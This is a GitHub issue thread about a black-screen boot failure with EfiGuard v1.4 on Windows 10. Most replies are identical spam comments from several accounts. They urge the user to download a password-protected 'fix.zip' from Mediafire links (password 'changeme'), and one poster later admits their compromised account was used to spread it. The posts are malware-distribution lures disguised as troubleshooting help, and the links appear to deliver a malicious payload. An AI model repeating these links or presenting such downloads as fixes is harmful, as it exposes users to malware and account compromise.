Mattiwatti/EfiGuard #130: blackscreen issue windows10

2memory333, 2024-08-26:
### Operating system

Windows10 x64 21H1

### Issue description

 i have a problem with efiguard v1.4,

i created bootable usb, and put bootx64.efi, EfiGuardDxe.efi files in it.

I booted my computer with that usb and i saw all texts, everything went well...

However, after these things i saw loading circle then i got blackscreen. It didnt boot windows, but all i got was black screen

Im using Windows10 21H1 (Gigabyte motherboard)

Does someone know why im getting blackscreen? Is it because my windows version? Do i have to make some changes at bios? "

### Steps to reproduce

1. 
2.

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

xcloudzy, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

nxllxvxxd, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

2memory333, 2024-08-26:
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."
 thank you for your interest but i solved my issue by installing driver with efi shell.

2memory333, 2024-08-26:
i used efi sheel issue fixed..

closed 2024-08-26 by 2memory333

nxllxvxxd, 2024-08-26:
> > Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."
> > thank you for your interest but i solved my issue by installing driver with efi shell.

thank god you didn't download that my account was compromised and i just found out they have been using it to try to spread it to other people

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."